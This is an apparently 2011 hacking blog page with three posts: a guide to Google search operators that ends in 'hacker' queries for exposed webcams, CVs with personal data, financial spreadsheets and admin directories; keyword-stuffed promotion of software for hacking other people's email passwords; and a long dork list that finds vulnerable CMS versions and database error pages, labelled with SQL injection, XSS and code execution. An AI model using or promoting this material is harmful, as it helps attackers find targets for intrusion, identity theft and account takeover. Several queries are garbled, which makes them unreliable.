How to search on Google like elite Hackers

Filed Under (Easy Hacking) by Aidil Akbar on 31-10-2011

373277_195728427122905_682180265_n

Google is best search engine in the world. Actually people think that Google’s popularity is because of its simple and fast searching interface but friends, its more popular because it has rich operators and query support that will make your searching experience even better. Most of us doesn’t know which operators are supported by Google and if they know some of them, they doesn’t know how actually these operators work and enrich our searching practice. Today, i will tell you How we can search on Google like elite hackers or simply say computer experts do. But for this its necessary that you should know and understand all the Google operators properly. So lets learn how we can enrich our searching experience in Google.


Google operators:

Google operators are classified into two basic categories:
1. Basic Google Operators like and, or, not etc.
2. Advanced google operators like inurl, intitle etc.
I am also including bonus search queries that are extremely useful for hackers.

Basic Google Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type “hacker+yahoo+science” in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like “google+hacking” NOT “security”.

Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
Description:- intitle:hacking returns all pages that have the string “hacking” in their title.
intitle:”index of” returns all pages that have string “index of” in their title.
Similar operator:- “allintitle”.

2) Inurl :- Returns all matches, where url of the pages contains given word.
Description:- inurl:admin returns all matches, where url of searched pages must contains the word “admin”.
Companion operator:- “allinurl”.

3) Site :- This operator narrows search to specific website.
Description : It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word “security” in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
“inurl:www.microsoft.com filetype:txt”

Other popular search terms only for Hackers:

1. For searching active webcams online:
In Google Search Box type :-
“Active Webcam Page” inurl:8080
Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.

2. For accessing the deleted messages on forums:
In Google Search Box type:-
“delete entries” inurl:admin/delete.asp
Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.

3. For searching personal information of person:
In Google Search box type :-
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.

4.For searching secret financial spread sheets:
In Google Search box type :-
intitle:”index of” finance.xls
Description- Secret financial spreadsheets ‘finance.xls’ or ‘finances.xls’ of companies may revealed by this query.

5. In Google Search box :-
intitle:”index.of” robots.txt
Description- The robots.txt file contains “rules” about where web spiders are allowed (and NOT allowed) to look in a website’s directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what’s somewhat public and what’s considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don’t forget to check out the other files in these directories since they are usually at the top directory level of the web server!

6. For locating admin directories of websites:
In Google Search box type :-
intitle:index.of.admin
Description- Locate “admin” directories that are accessible from directory listings.

7. For searching proxies online:
In Google Search box type :-
inurl:”nph-proxy.cgi” “start browsing”
Description- Returns lots of proxy servers that protects your identity online.

Note: This is not originally written by me. Thanks to Unknown and Google Search Guide.

  • Facebook
  • Google
  • StumbleUpon
  • TwitThis

Ethical Hacking Training

Filed Under (Easy Hacking, WORLD NEWS) by Aidil Akbar on 30-10-2011

276586_212211735475146_1711372987_n

Ethical Hacking Training

Ethical Hacking Training: Read on for password cracking information on email password hacking hacking hotmail passwords password hacking hacking email passwords hack hotmail password hack yahoo passwords hack email passwords hack hotmail hotmail hacking

Have you lost or forgotten a password? Do you need help with hacking programs? We offer trusted and verified Commercial Password Recovery websites. Password Cracking, Password Hacking, Password Management software, Data Recovery and Email Password Hacking for Hotmail, Yahoo, Gmail, AOL, and hacking all other email passwords has never been so easy.

We have done all the research and verified the REAL software to hack into ethical hacking training, application passwords, website passwords, hotmail password hacking, yahoo email passwords, gmail password software, AOL email hacking and many others. Includes email password hacking email hacking software hack passwords software yahoo password hacking hacking hotmail passwords software hacking passwords password hacking computer hacking software hack aol passwords hack gmail passwords hack emails cracking email passwords.

PASSWORD PORTAL RECENTLY STARTED SOFTWARE. SINCE YOU HAVE MANY CHOICES, AND SOME MAY SEEM LIKE FAKE. WE DECIDED TO GO OUT AND PURCHASE PRODUCTS FROM VARIOUS COMPANIES TO TEST AND VERIFY THE LEGITIMACY OF THE SOFTWARE. THE SOFTWARE THAT WE HAVE REVIEWED IS BELOW.

Hacking Email Passwords PasswordPortal gave the following software 5 STAR reviews:

Commercial Password Hacking and Recovery

Password cracking and hacking software for over 23 applications.
Passware, Inc. Password hacking software for over 25 applications.
Password Crackers, Inc. Password recovery and hacking services and software for 40+ applications.

Password Hacking & Cracking

Hacking Email Passwords - The true way to hack email passwords, use the Email Password Hacking software to obtain email passwords instantly! The Hack Email Passwords software is good for unlimited email passwords, and is backed by the company with a money back guarantee as well as free tech support by phone. Hack Email Passwords also offer their world-famous Hack Computers software, this software lets you hack into computers without programming, or extensive computer knowledge. The Hack Computers Software makes computer hacking easy with their state of the art software. Hack email passwords, hack into computers, hacking email passwords. Software to hack Yahoo passwords, hack Hotmail passwords, Hack AOL passwords, hacking all email passwords. Hacking email account passwords has never been so easy!
Email Password Hacking Software - Email Password Hacking, Email Hacking Software, Hack Passwords Software, Yahoo Password Hacking, Hacking Hotmail Passwords Software, Hacking Passwords, Password Hacking, Computer Hacking Software, Hack Aol Passwords, Hack Gmail Passwords, Hack Emails, Cracking Email Passwords.

Astalavista The search engine for security related websites. Hacking passwords, and Hack information
John the Ripper is a password cracking utility, currently available for UNIX, DOS, Win32. Its primary purpose is to detect weak UNIX passwords. Hack Passwords utility.
IOPUS offers a fine selection of easy to use security and internet related software for stealth PC monitoring, access control, parental control, invisible email autosender (office automation) and more. Hacking, and security related software.
Freeware Utilities for hacking passwords and more.
Packetstorm Security news and information for professionals including extensive password cracking and files archive. Information on Hacking Passwords.
Russian Password Crackers - Password cracking software and information. Password hacking software
The Argon - Privacy, Protection and Security on the Net. Safeguard from Hackers that hack passwords.

Password Management

Counterpane Passsafe - Brings the security of Blowfish to a password database. Keep email and computer passwords protected by password management software.
Email Password Hacking - Security programs that keep children and co-workers out of your computer. Keep hackers, children and co-workers from obtaining your email and computer passwords.
iJen Software - Security programs that keep children and co-workers out of your computer. Keep hackers, children and co-workers from obtaining your email and computer passwords.
Proginet UK - Enterprise password management software. Store you computer and email passwords.
weakPasswords Weak Password Security Auditing Utility. Check your email passwords for strength!

Security Consultants/Penetration & Hacking Testing

@Stake - Provides strategic, independent security consulting services that enable e-commerce for the Global 2000. Through information security expertise, systems integration skill, and business process understanding they deliver comprehensive security solutions that create competitive advantage. Keep your websites, businesses, and computers from computer hacking and password hacking.
Advanced Computing Technologies - offers a wide range of services, including: development of secure solutions, implementation, and security assessments. Be safe from computer hacking and password hacking. Check out their counter- hacking services today.
Century Com - CenturyCom systematically approachs security issues and eliminates them. We provide affordable solutions to meet business needs. A affordable and reliable way of protecting your self from computer and password hacking.
Counterpane Internet Security, Inc. Counterpane Internet Security, Inc. provides a comprehensive range of managed security monitoring services that enable e-business to be conducted safely. Have Counterpane Security monitor your business from email password hacking and computer hacking.
Corsaire Limited UK-based network security solutions. Safeguard from Hacking and Email Hacking.
E-Security - Offers security management software, information security management, internet security product, and firewall software. E-Security for protection from hackers hacking passwords & computers.
Hack Computers - Hack Computers, Learn how to Hack Computer, Hacking into Computers, Computer Hacking Software, Computer Hacking, hack computers software, tools to hack a computer. Hack computers software.
Information Security Consultants - Cyprus-based information security services to secure yourself from computer hacking as well as password hacking.
M-Tech Computer network security products and services company. Protect your network from hackers trying to hack into computers. A good solution to protect email passwords for your business.
MIS Corporate Defence Solutions - Global solution providers in computer hacking and data protection.
Network Presence, LLC - offers a comprehensive portfolio of security services, specializing in custom security projects tailored to the individual needs of each customer, stop Hackers from hacking into computers.
Password Crackers, Inc. Customized penetration testing and security consulting.
Peapod an e-initiative company, is one of Europes leading e-software and e-services providers, equipping Internet and enterprise networks and e-business environments with complete management security solutions. Manage your computers from hackers and email password hacking attempts.
Sec-Tec Network Security - Sec-Tec offers a range of industry-standard network security services, including penetration testing and internet security training. Safeguard from computer hacking.
Senet International Corporation - SeNet International was founded to deliver a full range of Internet Security and Virtual Private Network assessment services to corporations. Our goal is to enable companies to become, and remain, secure using as much of their internal resources and existing infrastructure as possible. See if your computer can be hacked, or email passwords protected.
Spectria Information Security, Secure eBusiness, Security Training & Awareness, Penetration Testing & Risk Assessment. Assess your servers for hack computers, or hack email passwords.
Strategic Security Computing SSC, Inc. is a leading provider of integrated security and investigative services. Investigate computer hacking, or who hack passwords.
Sword and Shield Enterprise Security - a security consulting firm specializing in information protection through the application of computer and network security technology.
Tiger Team - Tiger Team are a group of security consulting experts whose specialty is penetration testing. Test your computer from being computer hacked.
Williams Associates Protective Services, LLC - Network Security Audits, Penetration Testing, Intrusion Detection, Firewall and Anti-Virus Set-up & Configuration, Facility Security Audits, and more.

Have you ever wanted to Hack ANY Email Password? Hacking Email Passwords can be a difficult task to achieve. Many passwords are protected and changed often by the account holder, and you need to ensure you can get the password the user is currently using to login, in a sense you share the password. This is so you can have the continued pleasure of accessing the email anytime you would like, for as long as you would like.

You also want to make sure if the password is changed, your not spending hundreds or thousands of dollars every time the password is changed, and this is why we recommend email password hacking software. Services providing passwords for a fee in our experience are mostly scams, they provide fake proofs, and you cannot contact most of them after you have paid them. Be sure to go with a email password hacking company that provides you enough contact information to ensure you will be able to contact them anytime you have issues. We keep this website updated, so you do not fall victim to a scam!

Data or Media Recovery

1st Computer Traders Class 100 clean rooms, which enables the rebuilding of disks and their bespoke software enables the piecing of information.
1stDataRecovery.com - Your affordable data recovery service.
888Recovery.com  888recovery.com specialize in Hard Drives, Floppy Disks, Optical Media, Zip Disks, RAID, and Network Attached Storage systems to name a few.
Accessfix.com - AccessFIX is a Microsoft Access recovery software utility designed to restore corrupt or damaged files back into a new trouble free file. This utility recovers Access data bases created using Ms Access 97, 2000 and XP. Free demo available.
Knowledge of drive technologies, controller interfaces, computer hardware, data structures, file formats and unpublished network/operating system characteristics.
Adaptive Research & Design - Data recovery From: Crashes, Viruses, Electrical Surges, Sabotage and Accidental Murphy Failures.
Advanced Data Solutions - Data recovery from: Network Servers, Windows NT, NTFS, UDF, Novell, Unix, Raid 0-5, Windows 3.1x / 95 / 98, Removable Media, ZIP, Jaz, SyQuest, Bernoulli, Cd-r/w, Optical Floppy, ORB, Laptops etc. Damaged Hard Drives (Crashed, Fire, Water, Dropped) Viruses, Sabotage, Lost Passwords, Database Recovery, Forensic Data Exam, Deleted, Erased, Missing-Files, and Directories.
BitMart Data Recovery Software - Data recovery software & file undelete tool for FAT and NTFS file systems.
DataLeach File and data recovery and conversion service.

DataRecoveryBC.COM - Data, media recovery and computer forensics located in Canada/U.S.
Data Recovery by CBL - Recovers data from tape backups, hard drives, optical media, removable media and anything in between, getting data when all others have failed.
Data Recovery Group - One of the first companies to offer data recovery services for all popular operating systems, including DOS, Windows, Macintosh, Unix and Novell.
Data Recovery India - Specializing in recovering data using proprietary hardware and software tools. Indias #1 data recovery service based in New Delhi.
Disaster Recovery Group - Specializes in recovering lost data from all drive manufacturers and virtually all platforms.
Data Recovery Specialists - Data recovery specialists, drive recovery, disk recovery and lost data. Drive Service Company is the leading provider of data recovery and services. We resolve disk problems, major hard drive crashes, drive failures and disk failures. Since 1986.
Disklabs Complete data recovery solutions.
Drive Savers Data Recovery - Specializing in recovering lost data for individuals, corporations, educational institutions and government agencies for more than a decade. Recovery methods include the use of proprietary software to extract lost or corrupt files, and a certified class 100 cleanroom to recover data from physically damaged drives and other media.
Datalife Data Recovery, no fixed fee, United Kingdom.
DTI Data - Providing physical hard drive recovery and software based data recovery.
eMag Solutions - eMag Solutions specializes in delivering the client the most effective data storage solutions developed from our core competencies of data conversion, data recovery and data migration.
Excalibur Data Recovery - Recovers lost data on hard drives, 4mm tape, laptop and notebook hard drives, SyQuest cartridges, Zip disk, Jaz Disk, opticals and floppy diskettes.
ExcelRescue This automatic service repairs damaged or corrupt Excel files in every version including 95, 97, 2000, XP, and 2003.
Excelfix.com - Excel file recovery Software that restores damaged or corrupt files that cannot be opened. ExcelFIX works with all versions of Excel including 95, 97, 2000, XP, and 2003.
HDDRecovery Data and media recovery organization based in Australia.
Independent Technology Service Data recovery services using exclusive proprietary software.
IntelliRecovery Global data recovery company specializing in hard disk and hard drive recovery in any operating system.
Internet Desk, Inc. If you have a data loss due to a failed hard drive, they may be able to recover that precious information for you.
MDS Disk Service - Data recovery for crashed hard disk drives and other magnetic media.
MjM Data Recovery, Ltd. A completely free data recovery diagnosis and a no recovery no fee policy.
Office Recovery - The web source for data recovery software for corrupted Microsoft Office files.
On-Track - Recovery Services and Utility Software.
Phoenix Technology - Hard drive data recovery and software duplication.
R-tools Technology - R-tools Technology, Inc. is the leading provider of powerful data recovery, undelete, drive image, backup and PC privacy utilities for the Windows OS family.
Renew Data - Data Recovery, Computer Forensics and Media Conversions
Reynolds Data Recovery - Whatever the hard drive, operating system or application, theres a 90% chance they have the tools to recover the data.
Shadow Image Data Recovery - Shadow Image Data Recovery provides data recovery information, data recovery software and data recovery services.
Stellar Information Systems Ltd. We provide expert Data Recovery Services on IDE, EIDE, SCSI, MFM, RLL & ESDI hard disk drives Hard Drive Data Recovery services from all Operating Systems including Windows NT, Windows 2000, Windows XP, UNIX, LINUX, Windows95, Windows98, Windows ME, MS-DOS, DR-DOS, Mac, HP-UX, Sun Solaris, Novell NetWare.

Computer Forensics

C

enter for Computer Forensics - Providing litigation support and evidence gathering services since 1987.
DIBS USA - Renowned for the quality, reliability and evidential integrity of the equipment and services provided, DIBS USA is engaged to investigate some of the most sensitive and complex cases.
LC Technology - Data recovery, forensic investigations and training.
Lee & Allen - Provides the complete range of computer investigative services to assist with any legal, financial, or investigative process.
Mares and Company, LLC - Investigative and Forensic software for investigators and auditors.
New Technologies, Inc. The computer forensics pioneers that developed the original computer evidence training courses for the United States Treasury Department. A majority of the computer forensic software tools used in security risk assessments and E-commerce investigations have been developed by them.
Complete, competent forensic computer and data examinations.
Technology Pathways - Technology Pathways computer forensics teams use their own as well as other best-of-breed, court proven tools to acquire and report on computer evidence. Technology Pathways forensics response teams can augment existing corporate incident response teams, train existing teams, or serve as your primary action team.
TeCrime International, Inc. Specializing in all aspects of computer and internet crimes, white collar fraud and computer forensics.
Westpark Investigations - A full service private investigation firm specializing in computer investigative services and forensic computer examinations.

Encryption

Cypherix Encryption Software - Strong encryption products.
Cypherus Cutting edge encryption suite.
Deltacrypt Public key encryption software.
Drivecrypt Disk encryption system.
Meganet VME Encryption

Hackers and Crackers

Be A Hacker - Hack email passwords, hack into computers, hack service passwords. This includes AOL, Yahoo, Hotmail, Juno, and other email and service accounts.
Cult of the Dead Cow - News and Crackz from the hackers who brought you Back Orifice. Home page for members of the cDc.
Digital Outlaws - Digital Outlaws Homepage
Electronic Outlawz Association - Home page for members of the EOA.
Ghetto Hackers - Home page for members of the Ghetto Hackers.
Hack3r Wargames, Chat and Information
HFX International - Technology resources.
Interhack The Interhack posse is a small group of computer science and technology researchers. Currently, theyre exploring such areas as system and network security, privacy, and distributed applications. In addition to these efforts, they provide a variety of other security and internet-oriented services to organizations of all sizes.
Twisted Internet Services - Home page for TiS.

Data Backup

@Backup - Online data backup service.
BackupUSA.com - Online, offsite, automated backup solutiuon.
Connected Connected delivers Internet-based, real-time PC system repair and data recovery solutions for remote, desktop, and laptop computers in enterprises of all sizes.
Dr. Backup - Safeguard your valuable documents with an automatic nightly backup to the Internet. Free trial available.

Security Publications

2600 The Hacker Quarterly.
Computer Security News Daily - Provides daily selections of news and other information pertaining to computer/network security.
Disaster Recovery Journal - Business Continuity and Contingency Planning Quarterly.
SC Magazine is the largest circulation information security magazine.
Information Security - Magazine, newsletter and daily from ICSA.
International Journal of Forensic Computing - Addresses all aspects of computer evidence and computer investigations.
Phrack Magazine - Hacking ezine.
VPNLabs Get trusted, unbiased advice. Discover the right VPN for you or your organization. Learn how to build it or find a place to buy it. VPNlabs is an open community for researching, reviewing, and discussing Virtual Private Networks.

  • Facebook
  • Google
  • StumbleUpon
  • TwitThis

DORK VERSION SCHIZO

Filed Under (Easy Hacking) by Aidil Akbar on 27-10-2011

304255_129640737140939_100002850408628_126633_1142202355_n-150x1504

GOOGLE

* “1999-2004 FuseTalk Inc” -site:fusetalk.com

“2003 DUware All Rights Reserved”

“2004-2005 ReloadCMS Team.”

“2005 SugarCRM Inc. All Rights Reserved” “Powered By SugarCRM”

“Active Webcam Page” inurl:8080

“Based on DoceboLMS 2.0″

“BlackBoard 1.5.1-f | 2003-4 by Yves Goergen”

“BosDates Calendar System ” “powered by BosDates v3.2 by BosDev”

“Calendar programming by AppIdeas.com” filetypehp

“Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved” “Mambo is Free Software

released”

“Copyright 2004 Digital Scribe v.1.4″

“Copyright 2002 Agustin Dondo Scripts”

“CosmoShop by Zaunz Publishing” inurl:”cgi-bin/cosmoshop/lshop.cgi”

-V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*

“Cyphor (Release:” -www.cynox.ch

“delete entries” inurl:admin/delete.asp

“driven by: ASP Message Board”

“Enter ip” inurl:”php-ping.php”

“IceWarp Web Mail 5.3.0″ “Powered by IceWarp”

“Ideal BB Version: 0.1″ -idealbb.com

“index of” intext:fckeditor inurl:fckeditor

“inurl:/site/articles.asp?idcategory=”

“Maintained with Subscribe Me 2.044.09p”+”Professional” inurl:”s.pl”

“Mimicboard2 086″+”2000 Nobutaka Makino”+”password”+”message” inurlage=1

“News generated by Utopia News Pro” | “Powered By: Utopia News Pro”

“Obtenez votre forum Aztek” -site:forum-aztek.com

“Online Store - Powered by ProductCart”

“PhpCollab . Log In” | “NetOffice . Log In” | (intitle:”index.of.” intitlehpcollab|netoffice

inurlhpcollab|netoffice -gentoo)

“portailphp v1.3″ inurl:”index.php?affiche” inurl:”PortailPHP” -site:safari-msi.com

“Powered *: newtelligence” (”dasBlog 1.6″| “dasBlog 1.5″| “dasBlog 1.4″|”dasBlog 1.3″)

“powered by 4images”

“Powered by A-CART”

“powered by active php bookmarks” | inurl:bookmarks/view_group.php?id=

“Powered by AJ-Fork v.167″

“Powered by and copyright class-1″ 0.24.4

“powered by antiboard”

“Powered by autolinks pro 2.1″ inurl:register.php

“Powered by AzDg” (2.1.3 | 2.1.2 | 2.1.1)

“powered by claroline” -demo

“Powered by Coppermine Photo Gallery”

“Powered by Coppermine Photo Gallery” ( “v1.2.2 b” | “v1.2.1″ | “v1.2″ | “v1.1″ | “v1.0″)

“powered by CubeCart 2.0″

“Powered by CubeCart”

“Powered by CuteNews”

“Powered by DCP-Portal v5.5″

“Powered by DMXReady Site Chassis Manager” -site:dmxready.com

“Powered by FUDForum 2.6″ -site:fudforum.org -johnny.ihackstuff

“Powered by FUDForum 2.7″ -site:fudforum.org -johnny.ihackstuff

“Powered by FUDforum”

“powered by Gallery v” “[slideshow]“|”images” inurl:gallery

“Powered by Gallery v1.4.4″

“Powered by GTChat 0.95″+”User Login”+”Remember my login information”

“powered by guestbook script” -ihackstuff -exploit

“powered by GuppY v4″|”Site cr avec GuppY v4″

“Powered by IceWarp Software” inurl:mail

“Powered by Ikonboard 3.1.1″

“powered by ITWorking”

“Powered by Loudblog”

“Powered by MD-Pro” | “made with MD-Pro”

“Powered by Megabook *” inurl:guestbook.cgi

“Powered by MercuryBoard [v1"

"powered by minibb" -site:www.minibb.net -intext:1.7f

"Powered by My Blog" intext:"FuzzyMonkey.org"

"Powered by ocPortal" -demo -ocportal.com

"Powered by PHP Advanced Transfer Manager"

"powered by php icalendar" -ihackstuff -exploit

"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje

"powered by PhpBB 2.0.15" -sitehpbb.com

"Powered By phpCOIN 1.2.2"

"powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist

-tincan.co.uk

"Powered by PowerPortal v1.3"

"powered by runcms" -runcms.com -runcms.org

"powered by sblog" +"version 0.7"

"Powered by Simplog"

"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee

"Powered by UPB" (b 1.0)|(1.0 final)|(Public Beta 1.0b)

"Powered by Woltlab Burning Board" -"2.3.3" -"v2.3.3" -"v2.3.2" -"2.3.2"

"Powered by WordPress" -html filetypehp -demo -wordpress.org -bugtraq

"Powered by WowBB" -site:wowbb.com

"Powered by Xaraya" "Copyright 2005"

"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro

"Powered by XOOPS 2.2.3 Final"

"Powered by YaPig V0.92b"

"Powered by yappa-ng"

"Powered by Zorum 3.5"

"Powered by: Land Down Under 800" | "Powered by: Land Down Under 801" - www.neocrome.net

"Powered By: lucidCMS 1.0.11"

"running: Nucleus v3.1" -.nucleuscms.org -demo

"Site powered By Limbo CMS"

"Software PBLang" 4.65 filetypehp

"SquirrelMail version 1.4.4" inurl:src exthp

"Thank You for using WPCeasy"

"This page has been automatically generated by Plesk Server Administrator"

"This script was created by Php-ZeroNet" "Script . Php-ZeroNet"

"This website engine code is copyright" "2005 by Clever Copy" -inurl:demo

"This website powered by PHPX" -demo

"This website was created with phpWebThings 1.4"

"Welcome to the versatileBulletinBoard" | "Powered by versatileBulletinBoard"

"You have not provided a survey identification number" ERROR -xoops.org "please contact"

("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis

("Skin Design by Amie of Intense")|("Fanfiction Categories" "Featured Stories")|("default2, 3column,

Romance, eFiction")

("This Dragonfly installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com

(intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc

(intitle:"****frame XP Login")|(intitle:"****frame Presentation server Login")

+"Powered by Invision Power Board v2.0.0..2"

+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl

+intext:"powered by MyBulletinBoard"

Achievo webbased project management

allintitle:aspjar.com guestbook

E-market remote code execution

EarlyImpact Productcart

exthp intext:"Powered by phpNewMan Version"

extl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input

filetype:cgi inurl:nbmember.cgi

filetype:cgi inurldesk.cgi

filetype:cgi inurl:tseekdir.cgi

filetypehp intitle:"paNews v2.0b4"

filetypehp inurl:index.php inurl:"module=subjects" inurl:"func=*" (listpages| viewpage | listcat)

intext:"2000-2001 The phpHeaven Team" -sourceforge

intext:"2000-2001 The phpHeaven Team" -sourceforge

intext:"Calendar Program Copyright 1999 Matt Kruse" "Add an event"

intext:"LinPHA Version" intext:"Have fun"

intext:"PhpGedView Version" intext:"final - index" -inurl:demo

intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"

intext:"Powered by DEV web management system" -dev-wms.sourceforge.net -demo

intext:"Powered by flatnuke-2.5.3" +"Get RSS News" -demo

intext:"powered by gcards" -ihackstuff -exploit

intext:"Powered By Geeklog" -geeklog.net

intext:"Powered by phpBB 2.0.13" inurl:"cal_view_month.php"|inurl:"downloads.php"

intext:"Powered by Plogger!" -plogger.org -ihackstuff -exploit

intext:"Powered by SimpleBBS v1.1"*

intext:"Powered By: Snitz Forums 2000 Version 3.4.00..03"

intext"UBB.threads 6.2"|"UBB.threads 6.3") intext:"You * not logged *" -site:ubbcentral.com

intitle:"4images - Image Gallery Management System" and intext:"Powered by 4images 1.7.1"

intitle:"b2evo installer" intext:"Installer fr Version"

intitle:"blog torrent upload"

intitle:"EMUMAIL - Login" "Powered by EMU Webmail"

intitle:"HelpDesk" "If you need additional help, please email helpdesk at"

intitle:"igenus webmail login"

intitle:"Looking Glass v20040427" "When verifying an URL check one of those"

intitle:"MRTG/RRD" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)

intitle:"myBloggie 2.1.1..2 - by myWebland"

intitle:"osTicket :: Support Ticket System"

intitle:"PHP TopSites FREE Remote Admin"

intitle:"php********or web interface"

intitle:"PowerDownload" ("PowerDownload v3.0.2 " | "PowerDownload v3.0.3 " )

 -siteowerscripts.org

intitle:"View Img" inurl:viewimg.php

intitle:"WebJeff - FileManager" intext:"login" intext:Pass|PAsse

intitle:"WordPress > * > Login form" inurl:"wp-login.php"

intitle:admbook intitle:version filetypehp

intitle:guestbook "advanced guestbook 2.2 powered"

intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"

intitle:guestbook inurl:guestbook "powered by Advanced guestbook 2.*" "Sign the Guestbook"

intitle:Mantis "Welcome to the bugtracker" "0.15 | 0.16 | 0.17 | 0.18"

intitle:PHPOpenChat inurl:"index.php?language="

intitle:welcome.to.horde

inurl:"/cgi-bin/loadpage.cgi?user_id="

inurl:"/login.asp?folder=" "Powered by: i-Gallery 3.3"

inurl:"/site/articles.asp?idcategory="

inurl:"comment.php?serendipity"

inurl:"extras/update.php" intext:mysql.php -display

inurl:"forumdisplay.php" +"Powered by: vBulletin Version 3.0.0..4"

inurl:"messageboard/Forum.asp?"

inurl:"slxweb.dll"

inurl:"wfdownloads/viewcat.php?list="

inurl:*.exe ext:exe inurl:/*cgi*/

inurl:/SiteChassisManager/

inurl:cal_make.pl

inurl:chitchat.php "choose graphic"

inurl:citrix/****framexp/default/login.asp? ClientDetection=On

inurl:comersus_message.asp

inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php

inurl:database.php | inurl:info_db.php exthp "Database V2.*" "Burning Board *"

inurl:directorypro.cgi

inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su

nombre de usuario" -extdf -inurl:"download.php

inurl:gotoURL.asp?url=

inurl:index.php fees shop link.codes merchantAccount

inurl:install.pl intitle:GTchat

inurlerldiver.cgi ext:cgi

inurl:resetcore.php exthp

inurl:server.php exthp intext:"No SQL" -Released

inurl:sphpblog intext:"Powered by Simple PHP Blog 0.4.0"

inurl:sysinfo.cgi ext:cgi

inurl:technote inurl:main.cgi*filename=*

inurl:tmssql.php exthp mssql pear adodb -cvs -akbk

inurl:ttt-webmaster.php

inurl:wiki/MediaWiki

Invision Power Board SSI.PHP SQL Injection

mnGoSearch vulnerability

phpLDAPadmin intitlehpLDAPadmin filetypehp inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6

| 0.9.7)

Powered by PHP-Fusion v6.00.109 2003-2005. -php-fusion.co.uk

powered.by.instaBoard.version.1.3

Powered.by:.vBulletin.Version ...3.0.6

Quicksite demopages for Typo3

ReMOSitory module for Mambo

uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album

vBulletin version 3.0.1 newreply.php XSS

VP-ASP Shopping Cart XSS

WEBalbum 2004-2006 duda -ihackstuff -exploit

WebAPP directory traversal

HATA MESAJLARI

______________

"A syntax error has occurred" filetype:ihtml

"access denied for user" "using password"

"An illegal character has been found in the statement" -"previous message"

"ASP.NET_SessionId" "data source="

"Can't connect to local" intitle:warning

"Chatologica ****Search" "stack tracking"

"detected an internal error [IBM][CLI Driver][DB2/6000]”

“error found handling the request” cocoon filetype:xml

“Fatal error: Call to undefined function” -reply -the -next

“Incorrect syntax near”

“Incorrect syntax near”

“Internal Server Error” “server at”

“Invision Power Board Database Error”

“ORA-00933: SQL command not properly ended”

“ORA-12541: TNS:no listener” intitle:”error occurred”

“Parse error: parse error, unexpected T_VARIABLE” “on line” filetypehp

“PostgreSQL query failed: ERROR: parser: parse error”

“Supplied argument is not a valid MySQL result resource”

“Syntax error in query expression ” -the

“The script whose uid is ” “is not allowed to access”

“There seems to have been a problem with the” ” Please try again by clicking the ******* button in your web browser.”

“Unable to jump to row” “on MySQL result index” “on line”

“Unclosed quotation mark before the character string”

“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum

“Warning: Cannot modify header information - headers already sent”

“Warning: Division by zero in” “on line” -forum

“Warning: mysql_connect(): Access denied for user: ‘*@*” “on line” -help -forum

“Warning: mysql_query()” “invalid query”

“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”

“Warning: Supplied argument is not a valid File-Handle resource in”

“Warning:” “failed to open stream: HTTP request failed” “on line”

“Warning:” “SAFE MODE Restriction in effect.” “The script whose uid is” “is not allowed to access owned by uid 0 in” “on line”

“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”

An unexpected token “END-OF-STATEMENT” was found

Coldfusion Error Pages

filetype:asp + “[ODBC SQL"

filetype:asp "Custom Error Message" Category Source

filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"

filetypehp inurl:"logging.php" "Discuz" error

IIS 4.0 error messages

IIS web server error messages

Internal Server Error

intext:"Error Message : Error loading required libraries."

intext:"Warning: Failed opening" "on line" "include_path"

intitle:"Apache Tomcat" "Error Report"

intitle:"Default PLESK Page"

intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm

intitle:"Error Occurred" "The error occurred in" filetype:cfm

intitle:"Error using Hypernews" "Server Software"

